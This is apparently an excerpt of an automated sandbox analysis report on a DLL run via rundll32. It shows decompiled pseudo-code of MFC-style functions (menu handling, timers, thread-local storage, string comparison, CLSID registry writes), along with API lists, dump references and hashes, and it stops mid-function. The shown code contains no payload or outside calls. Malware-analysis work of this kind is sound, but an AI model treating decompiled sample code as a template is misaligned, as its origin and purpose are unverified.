                                                                                                        0x10014361
                                                                                                        0x10014363
                                                                                                        0x10014365
                                                                                                        0x10014368
                                                                                                        0x10014388
                                                                                                        0x10014388
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001436a
                                                                                                        0x1001436a
                                                                                                        0x10014372
                                                                                                        0x10014375
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014377
                                                                                                        0x10014378
                                                                                                        0x1001437b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001437d
                                                                                                        0x1001437f
                                                                                                        0x10014385
                                                                                                        0x00000000
                                                                                                        0x10014330
                                                                                                        0x10014330
                                                                                                        0x1001438b
                                                                                                        0x1001438e
                                                                                                        0x10014394
                                                                                                        0x1001439a
                                                                                                        0x1001439d
                                                                                                        0x1001444d
                                                                                                        0x00000000
                                                                                                        0x1001444d
                                                                                                        0x100143a9
                                                                                                        0x100143af
                                                                                                        0x100143b3
                                                                                                        0x100143b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143bf
                                                                                                        0x100143e9
                                                                                                        0x100143ed
                                                                                                        0x100143f1
                                                                                                        0x100143ff
                                                                                                        0x100143ff
                                                                                                        0x100143ff
                                                                                                        0x10014401
                                                                                                        0x10014401
                                                                                                        0x10014402
                                                                                                        0x10014402
                                                                                                        0x10014406
                                                                                                        0x1001440e
                                                                                                        0x10014414
                                                                                                        0x10014419
                                                                                                        0x10014438
                                                                                                        0x10014438
                                                                                                        0x1001443b
                                                                                                        0x00000000
                                                                                                        0x1001443b
                                                                                                        0x1001441e
                                                                                                        0x10014433
                                                                                                        0x10014429
                                                                                                        0x1001442b
                                                                                                        0x1001442e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x00000000
                                                                                                        0x10014433
                                                                                                        0x100143f3
                                                                                                        0x100143f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143fc
                                                                                                        0x00000000
                                                                                                        0x100143fc
                                                                                                        0x100143c6
                                                                                                        0x100143cd
                                                                                                        0x100143d0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143d7
                                                                                                        0x100143db
                                                                                                        0x100143de
                                                                                                        0x100143e5
                                                                                                        0x00000000
                                                                                                        0x100143e5
                                                                                                        0x1001443e
                                                                                                        0x1001443e
                                                                                                        0x10014441
                                                                                                        0x10014444
                                                                                                        0x00000000
                                                                                                        0x100143a9
                                                                                                        0x1001432e
                                                                                                        0x100142f9
                                                                                                        0x10014301
                                                                                                        0x10014304
                                                                                                        0x10014309
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014309
                                                                                                        0x10014451

                                                                                                        APIs
                                                                                                          • Part of subcall function 10029945: GetFocus.USER32 ref: 10029946
                                                                                                          • Part of subcall function 10029945: GetParent.USER32(00000000), ref: 1002996F
                                                                                                          • Part of subcall function 10029945: GetWindowLongA.USER32 ref: 1002998A
                                                                                                          • Part of subcall function 10029945: GetParent.USER32(?), ref: 10029998
                                                                                                          • Part of subcall function 10029945: GetDesktopWindow.USER32 ref: 1002999C
                                                                                                          • Part of subcall function 10029945: SendMessageA.USER32 ref: 100299B0
                                                                                                        • GetMenu.USER32(?), ref: 1001433E
                                                                                                        • GetMenu.USER32(?), ref: 10014352
                                                                                                        • GetMenuItemCount.USER32 ref: 1001435B
                                                                                                        • GetSubMenu.USER32 ref: 1001436C
                                                                                                        • GetMenuItemCount.USER32 ref: 1001438E
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100143AF
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100143D7
                                                                                                        • GetMenuItemCount.USER32 ref: 1001440E
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10014429
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 4186786570-0
                                                                                                        • Opcode ID: e6094f0103dc02adf40df14fdf02a2557e22794f0ae115a2513906b63164a03e
                                                                                                        • Instruction ID: 11055ab72b521a342d6ad75c80d1664be5e7a41845d89626d5fa920a2132a9d2
                                                                                                        • Opcode Fuzzy Hash: e6094f0103dc02adf40df14fdf02a2557e22794f0ae115a2513906b63164a03e
                                                                                                        • Instruction Fuzzy Hash: 76516A3190021A9FDB01DF64C980A9EBBF5FF48690F224565E825EA160DB31EE81DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002BBF1, Relevance: 13.6, APIs: 9, Instructions: 130timekeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E1002BBF1(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t91 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E1000AB4C(_t72, _t76, _t84, _t89, _t91);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E1000FBCD(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E10010B28(_t75, _t89, _t85) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t94 = _t75;
					if(_t75 == 0) {
						E1000836F(_t75, _t81, _t85, _t89, _t94);
					}
					_t81 = _t75;
					if(E1001175A(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E1000E5E5(_t75, _t81, _t90, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E1000FBCD(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}


























                                                                                                        0x1002bbf1
                                                                                                        0x1002bbfa
                                                                                                        0x1002bbfc
                                                                                                        0x1002bc02
                                                                                                        0x1002bc05
                                                                                                        0x1002bd58
                                                                                                        0x1002bd58
                                                                                                        0x1002bc12
                                                                                                        0x1002bc18
                                                                                                        0x1002bc1b
                                                                                                        0x1002bc28
                                                                                                        0x1002bc3a
                                                                                                        0x1002bc3f
                                                                                                        0x1002bc42
                                                                                                        0x1002bcae
                                                                                                        0x1002bcae
                                                                                                        0x1002bcae
                                                                                                        0x1002bcb2
                                                                                                        0x1002bcbc
                                                                                                        0x1002bd12
                                                                                                        0x1002bd19
                                                                                                        0x1002bd23
                                                                                                        0x1002bd23
                                                                                                        0x1002bd2b
                                                                                                        0x1002bd31
                                                                                                        0x1002bd31
                                                                                                        0x1002bd39
                                                                                                        0x1002bd3f
                                                                                                        0x1002bd45
                                                                                                        0x1002bd4e
                                                                                                        0x1002bd4e
                                                                                                        0x1002bd45
                                                                                                        0x00000000
                                                                                                        0x1002bd55
                                                                                                        0x1002bcc5
                                                                                                        0x1002bccb
                                                                                                        0x1002bcd7
                                                                                                        0x1002bcdb
                                                                                                        0x1002bd01
                                                                                                        0x1002bd01
                                                                                                        0x1002bd04
                                                                                                        0x1002bd08
                                                                                                        0x1002bd0c
                                                                                                        0x1002bd10
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002bd10
                                                                                                        0x1002bcdd
                                                                                                        0x1002bce2
                                                                                                        0x00000000
                                                                                                        0x1002bcf0
                                                                                                        0x1002bcf3
                                                                                                        0x1002bcf8
                                                                                                        0x1002bcfa
                                                                                                        0x1002bcfa
                                                                                                        0x1002bcff
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002bcff
                                                                                                        0x1002bce2
                                                                                                        0x1002bc46
                                                                                                        0x1002bc4b
                                                                                                        0x1002bc4d
                                                                                                        0x1002bc56
                                                                                                        0x1002bc6c
                                                                                                        0x1002bc6c
                                                                                                        0x00000000
                                                                                                        0x1002bc58
                                                                                                        0x1002bc58
                                                                                                        0x1002bc5a
                                                                                                        0x1002bc5c
                                                                                                        0x1002bc5c
                                                                                                        0x1002bc61
                                                                                                        0x1002bc6a
                                                                                                        0x1002bc70
                                                                                                        0x1002bc70
                                                                                                        0x1002bc75
                                                                                                        0x1002bc7b
                                                                                                        0x1002bc77
                                                                                                        0x1002bc77
                                                                                                        0x1002bc77
                                                                                                        0x1002bc85
                                                                                                        0x1002bc8c
                                                                                                        0x1002bc90
                                                                                                        0x1002bc96
                                                                                                        0x1002bc92
                                                                                                        0x1002bc92
                                                                                                        0x1002bc92
                                                                                                        0x1002bc9b
                                                                                                        0x1002bca8
                                                                                                        0x1002bca8
                                                                                                        0x1002bc9b
                                                                                                        0x00000000
                                                                                                        0x1002bc8c
                                                                                                        0x00000000
                                                                                                        0x1002bc6a

                                                                                                        APIs
                                                                                                        • GetKeyState.USER32 ref: 1002BBFC
                                                                                                        • GetCursorPos.USER32(?), ref: 1002BC1B
                                                                                                        • ScreenToClient.USER32 ref: 1002BC28
                                                                                                        • GetCapture.USER32 ref: 1002BC7E
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • ClientToScreen.USER32(?,?), ref: 1002BCC5
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 1002BCD1
                                                                                                        • IsChild.USER32(?,00000000), ref: 1002BCE6
                                                                                                        • KillTimer.USER32(?,0000E001), ref: 1002BD23
                                                                                                        • KillTimer.USER32(?,0000E000), ref: 1002BD3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3327746620-0
                                                                                                        • Opcode ID: 5e307a810b12152c442ace14b74901c03a1b6eed3aaefbbdbc235e4a2753dc9f
                                                                                                        • Instruction ID: 159fe96bd306aee816cdcfac18968978c7f6b861776227c188a7d2a48db909e4
                                                                                                        • Opcode Fuzzy Hash: 5e307a810b12152c442ace14b74901c03a1b6eed3aaefbbdbc235e4a2753dc9f
                                                                                                        • Instruction Fuzzy Hash: EC41A231600A06DFDB20DB64DC85A9E7BF5FF44364F614669E861E72E1EB30DE409B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10029F80, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10029F80(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1003EEB5(0x10055913, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10029C33(0x10);
						__eflags = _t39;
						if(_t39 == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1005d6a4;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10029D4F( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							if( *(_t65 + 0xc) != 0) {
								_t41 = E10001FC0(_t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E10001FC0(_t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000833B(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E1003E9B0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E1003EF21(_t36);
			}














                                                                                                        0x10029f80
                                                                                                        0x10029f87
                                                                                                        0x10029f8c
                                                                                                        0x10029f8e
                                                                                                        0x10029f91
                                                                                                        0x10029f95
                                                                                                        0x10029f98
                                                                                                        0x10029f9e
                                                                                                        0x10029fa5
                                                                                                        0x1002a0a6
                                                                                                        0x10029fb4
                                                                                                        0x10029fbc
                                                                                                        0x10029fc0
                                                                                                        0x10029ff4
                                                                                                        0x10029ff7
                                                                                                        0x10029ffc
                                                                                                        0x10029ffe
                                                                                                        0x1002a00a
                                                                                                        0x1002a00a
                                                                                                        0x1002a000
                                                                                                        0x1002a000
                                                                                                        0x1002a006
                                                                                                        0x1002a006
                                                                                                        0x1002a00c
                                                                                                        0x1002a014
                                                                                                        0x1002a017
                                                                                                        0x1002a01a
                                                                                                        0x00000000
                                                                                                        0x10029fc2
                                                                                                        0x10029fc2
                                                                                                        0x10029fc8
                                                                                                        0x10029fd7
                                                                                                        0x10029fda
                                                                                                        0x1002a03e
                                                                                                        0x1002a044
                                                                                                        0x1002a049
                                                                                                        0x10029fdc
                                                                                                        0x10029fe1
                                                                                                        0x10029fe7
                                                                                                        0x10029fea
                                                                                                        0x10029fea
                                                                                                        0x1002a04f
                                                                                                        0x1002a051
                                                                                                        0x1002a056
                                                                                                        0x1002a05c
                                                                                                        0x1002a05c
                                                                                                        0x1002a064
                                                                                                        0x1002a075
                                                                                                        0x1002a081
                                                                                                        0x1002a086
                                                                                                        0x1002a08c
                                                                                                        0x1002a08c
                                                                                                        0x10029fc8
                                                                                                        0x1002a08f
                                                                                                        0x1002a094
                                                                                                        0x1002a09e
                                                                                                        0x1002a09e
                                                                                                        0x1002a0a1
                                                                                                        0x1002a0a1
                                                                                                        0x1002a0a7
                                                                                                        0x1002a0b2

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10029F87
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,1002A135,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029F98
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 10029FB6
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 10029FEA
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 1002A056
                                                                                                        • _memset.LIBCMT ref: 1002A075
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 1002A086
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 1002A0A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1891723912-0
                                                                                                        • Opcode ID: 172c129eae0db517c8b6dd071ff8b8284833e4f914b3c9d64947cd1ec8495298
                                                                                                        • Instruction ID: e85b89dc55b8c4c7bfc2145fc03a69089535fd0d038428d6430331e622b520f8
                                                                                                        • Opcode Fuzzy Hash: 172c129eae0db517c8b6dd071ff8b8284833e4f914b3c9d64947cd1ec8495298
                                                                                                        • Instruction Fuzzy Hash: A5319C74500A16EFDB20DF50D8C5D6EBBB4EF00350B61C52AE956A66A2CB30AE90CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002EF48, Relevance: 13.6, APIs: 9, Instructions: 85stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002EF48(void* __esi, char* _a4, int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				int _v1572;
				char* _v1576;
				void* __ebx;
				void* __edi;
				signed int _t20;
				int _t23;
				void* _t26;
				char* _t35;
				int _t37;
				void* _t42;
				char* _t43;
				void* _t47;
				signed int _t49;

				_t44 = __esi;
				_t20 =  *0x10072650; // 0xb5e27fef
				_v8 = _t20 ^ _t49;
				_t37 = _a8;
				_t43 = _a4;
				_v1576 = _t37;
				if(lstrcmpiA(_t43, _t37) == 0) {
					_t23 = GetSystemMetrics(0x2a);
					if(_t23 != 0) {
						_push(__esi);
						_v1572 = lstrlenA(_t43);
						if(_v1572 != lstrlenA(_t37)) {
							L13:
							_t26 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeExA(_t37, 1, _t43, 0xffffffff,  &_v1568);
							GetStringTypeExA(_t37, 4, _t43, 0xffffffff,  &_v528);
							GetStringTypeExA(_t37, 1, _v1576, 0xffffffff,  &_v1048);
							_t35 = _t43;
							if( *_t43 == 0) {
								L10:
								_t26 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x61c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x414))) {
									_t47 = _t47 + 2;
									if( *_t35 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
						_pop(_t44);
					} else {
						_t26 = _t23 + 1;
					}
				} else {
					_t26 = 0;
				}
				return E10039F21(_t26, _t37, _v8 ^ _t49, _t42, _t43, _t44);
			}




















                                                                                                        0x1002ef48
                                                                                                        0x1002ef51
                                                                                                        0x1002ef58
                                                                                                        0x1002ef5c
                                                                                                        0x1002ef60
                                                                                                        0x1002ef65
                                                                                                        0x1002ef73
                                                                                                        0x1002ef7e
                                                                                                        0x1002ef86
                                                                                                        0x1002ef8e
                                                                                                        0x1002ef99
                                                                                                        0x1002efa7
                                                                                                        0x1002f034
                                                                                                        0x1002f034
                                                                                                        0x1002efad
                                                                                                        0x1002efb9
                                                                                                        0x1002efc8
                                                                                                        0x1002efd7
                                                                                                        0x1002efeb
                                                                                                        0x1002eff0
                                                                                                        0x1002eff2
                                                                                                        0x1002f020
                                                                                                        0x1002f022
                                                                                                        0x1002eff4
                                                                                                        0x1002eff4
                                                                                                        0x1002eff6
                                                                                                        0x1002f014
                                                                                                        0x1002f01e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002f01e
                                                                                                        0x00000000
                                                                                                        0x1002eff6
                                                                                                        0x1002eff2
                                                                                                        0x1002f023
                                                                                                        0x1002f023
                                                                                                        0x1002ef88
                                                                                                        0x1002ef88
                                                                                                        0x1002ef88
                                                                                                        0x1002ef75
                                                                                                        0x1002ef75
                                                                                                        0x1002ef75
                                                                                                        0x1002f031

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystemlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 2335526769-0
                                                                                                        • Opcode ID: 0d6d0573f979f267a73128ca0441079658bf37a2eb8bd65e14dee8729da5b269
                                                                                                        • Instruction ID: 90b8b980a8d9a3808b570a2489c9a8f5eb7b1165c7363315dc008fc05e8f7836
                                                                                                        • Opcode Fuzzy Hash: 0d6d0573f979f267a73128ca0441079658bf37a2eb8bd65e14dee8729da5b269
                                                                                                        • Instruction Fuzzy Hash: 1D21FD71900269AAE710DB749C84BAF7BECEB497A0F5002B5FD11E21D2DA709D41CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10035404, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E10035404(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t54;
				void* _t61;
				char* _t75;
				long _t77;
				void* _t84;
				void* _t97;
				void* _t99;
				void* _t100;
				char _t103;
				CHAR* _t104;
				void* _t105;
				CHAR* _t106;
				char* _t107;
				void* _t109;

				_t97 = __edx;
				_t107 = _t109 - 0xfc;
				_t54 =  *0x10072650; // 0xb5e27fef
				_t107[0x100] = _t54 ^ _t107;
				_push(0x24);
				E1003EE82(0x1005626f, __ebx, __edi, __esi);
				_t103 = _t107[0x10c];
				_t99 = _t107[0x11c];
				 *(_t107 - 0x1c) = _t103;
				 *(_t107 - 0x2c) = _t107[0x110];
				 *(_t107 - 0x18) = _t99;
				E10001DB0(_t107 - 0x14, E10007F7E());
				 *(_t107 - 4) =  *(_t107 - 4) & 0x00000000;
				_t61 = E10007F7E();
				_t86 = _t107 - 0x20;
				E10001DB0(_t107 - 0x20, _t61);
				 *(_t107 - 0x24) =  *(_t107 - 0x24) & 0x00000000;
				if(_t99 == 0x80000000) {
					RegOpenKeyExA(0x80000000, "CLSID", 0, 0x20019, _t107 - 0x24);
				}
				 *(_t107 - 0x30) =  *(_t107 - 0x24);
				_t104 =  *_t103;
				 *(_t107 - 4) = 2;
				 *(_t107 - 0x28) = 1;
				if(_t104 == 0) {
					L16:
					E1001BF1F(_t107 - 0x30);
					E10001280( &(( *(_t107 - 0x20))[0xfffffffffffffff0]), _t97);
					E10001280( &(( *(_t107 - 0x14))[0xfffffffffffffff0]), _t97);
					 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
					_pop(_t100);
					_pop(_t105);
					_pop(_t84);
					return E10039F21( *(_t107 - 0x28), _t84, _t107[0x100] ^ _t107, _t97, _t100, _t105);
				} else {
					do {
						 *(_t107 - 0x1c) =  &(( *(_t107 - 0x1c))[1]);
						if( *(_t107 - 0x18) != 0x80000000 ||  *_t104 != 0) {
							 *(_t107 - 0x10) =  &(( &(_t104[1]))[lstrlenA(_t104)]);
							E1002FA8E(_t86, _t97, _t107 - 0x14, _t104,  *(_t107 - 0x2c), _t107[0x114]);
							E1002FA8E(_t86, _t97, _t107 - 0x20,  *(_t107 - 0x10),  *(_t107 - 0x2c), _t107[0x114]);
							_t75 =  *(_t107 - 0x14);
							if( *(_t107 - 0x18) != 0x80000000 ||  *((intOrPtr*)(_t75 - 0xc)) != 0) {
								if(_t107[0x118] != 0) {
									L11:
									_t106 =  *(_t107 - 0x20);
									 *(_t107 - 0x10) = _t75;
									_t77 = RegSetValueA( *(_t107 - 0x18),  *(_t107 - 0x10), 1, _t106, lstrlenA(_t106));
									if(_t77 != 0) {
										if(_t77 != 5) {
											 *(_t107 - 0x28) =  *(_t107 - 0x28) & 0x00000000;
										}
										goto L16;
									}
									goto L12;
								}
								_t86 = _t107;
								 *(_t107 - 0x10) = 0x100;
								if(RegQueryValueA( *(_t107 - 0x18), _t75, _t107, _t107 - 0x10) == 0) {
									goto L12;
								}
								_t75 =  *(_t107 - 0x14);
								goto L11;
							} else {
								goto L12;
							}
						}
						L12:
						_t104 =  *( *(_t107 - 0x1c));
